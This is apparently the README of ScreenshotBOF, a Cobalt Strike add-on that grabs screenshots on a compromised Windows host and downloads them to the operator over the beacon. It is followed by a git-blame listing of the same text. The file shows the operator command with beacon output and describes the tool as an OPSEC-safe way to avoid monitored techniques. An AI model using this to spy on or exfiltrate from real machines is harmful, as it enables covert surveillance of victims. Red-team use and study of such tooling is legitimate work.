ScreenshotBOF/README.md

# ScreenshotBOF

An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot downloaded in memory.

## Self Compilation
1. git clone the repo
2. open the solution in Visual Studio
3. Build project BOF

## Save methods:  
0. drop file to disk
1. download file over beacon (Cobalt Strike only)

## Usage
1. import the screenshotBOF.cna script into Cobalt Strike
2. use the command screenshot_bof {local filename} {save method 0/1}
  
```
beacon> screenshot_bof sad.bmp 1
[*] Running screenshot BOF by (@codex_tf2)
[+] host called home, sent: 5267 bytes
[+] received output:
[*] Screen saved to bitmap
[+] received output:
[*] Downloading bitmap over beacon with filename sad.bmp
[*] started download of sad.bmp
```

3. if downloaded over beacon, BMP can be viewed in Cobalt Strike by right clicking the download and clicking "Render BMP" (credit @BinaryFaultline)  
  
![image](https://user-images.githubusercontent.com/29991665/199232459-0601e5d8-d534-4f05-bde4-c8acf3bd3c12.png)
  
![image](https://user-images.githubusercontent.com/29991665/199233465-8159cec4-90a4-4d82-beff-b012753b3559.png)


## Notes
- no evasion is performed, which should be fine since the WinAPIs used are not malicious

## Why did I make this?
Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability.

## Credits
- Made using https://github.com/securifybv/Visual-Studio-BOF-template
- Save BMP to file from https://stackoverflow.com/a/60667564
- in memory download from https://github.com/anthemtotheego/CredBandit
- @BinaryFaultline for BMP rendering in aggressorscript, and screenshot callback branch
first commit 2022-10-23 01:58:24 -07:00			`# ScreenshotBOF`

readme 2022-10-25 09:35:38 -07:00			`An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot downloaded in memory.`
first commit 2022-10-23 01:58:24 -07:00
compile steps 2022-10-23 02:38:51 -07:00			`## Self Compilation`
			`1. git clone the repo`
			`2. open the solution in Visual Studio`
			`3. Build project BOF`

s 2022-11-01 05:26:23 -07:00			`## Save methods:`
bmp renderer and user args 2022-11-01 05:25:10 -07:00			`0. drop file to disk`
			`1. download file over beacon (Cobalt Strike only)`
s 2022-11-01 05:26:59 -07:00
			`## Usage`
			`1. import the screenshotBOF.cna script into Cobalt Strike`
			`2. use the command screenshot_bof {local filename} {save method 0/1}`
s 2022-11-01 05:26:23 -07:00
first commit 2022-10-23 01:58:24 -07:00			```
bmp renderer and user args 2022-11-01 05:25:10 -07:00			`beacon> screenshot_bof sad.bmp 1`
readme 2022-10-23 02:06:37 -07:00			`[*] Running screenshot BOF by (@codex_tf2)`
bmp renderer and user args 2022-11-01 05:25:10 -07:00			`[+] host called home, sent: 5267 bytes`
readme 2022-10-23 02:06:37 -07:00			`[+] received output:`
bmp renderer and user args 2022-11-01 05:25:10 -07:00			`[*] Screen saved to bitmap`
readme 2022-10-23 02:06:37 -07:00			`[+] received output:`
bmp renderer and user args 2022-11-01 05:25:10 -07:00			`[*] Downloading bitmap over beacon with filename sad.bmp`
readme 2022-10-25 09:35:38 -07:00			`[*] started download of sad.bmp`
first commit 2022-10-23 01:58:24 -07:00			```

Update README.md 2022-11-01 05:29:47 -07:00			`3. if downloaded over beacon, BMP can be viewed in Cobalt Strike by right clicking the download and clicking "Render BMP" (credit @BinaryFaultline)`

Update README.md 2022-11-01 05:29:28 -07:00			`![image](https://user-images.githubusercontent.com/29991665/199232459-0601e5d8-d534-4f05-bde4-c8acf3bd3c12.png)`
Update README.md 2022-11-01 05:34:11 -07:00
			`![image](https://user-images.githubusercontent.com/29991665/199233465-8159cec4-90a4-4d82-beff-b012753b3559.png)`

Update README.md 2022-11-01 05:29:28 -07:00

Update README.md 2022-11-01 05:29:47 -07:00
first commit 2022-10-23 01:58:24 -07:00			`## Notes`
			`- no evasion is performed, which should be fine since the WinAPIs used are not malicious`

			`## Why did I make this?`
credits 2022-10-23 02:04:09 -07:00			`Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability.`

			`## Credits`
credits 2022-10-23 11:39:54 -07:00			`- Made using https://github.com/securifybv/Visual-Studio-BOF-template`
readme 2022-10-25 09:35:38 -07:00			`- Save BMP to file from https://stackoverflow.com/a/60667564`
bmp renderer and user args 2022-11-01 05:25:10 -07:00			`- in memory download from https://github.com/anthemtotheego/CredBandit`
Update README.md 2022-11-01 05:29:28 -07:00			`- @BinaryFaultline for BMP rendering in aggressorscript, and screenshot callback branch`